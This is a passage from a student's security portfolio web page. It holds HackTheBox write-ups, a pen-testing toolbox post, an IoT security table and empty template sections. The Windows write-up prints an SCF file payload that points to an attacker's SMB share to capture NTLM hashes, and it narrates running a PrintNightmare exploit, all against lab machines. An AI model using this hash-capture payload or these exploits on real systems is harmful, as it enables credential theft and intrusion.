          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
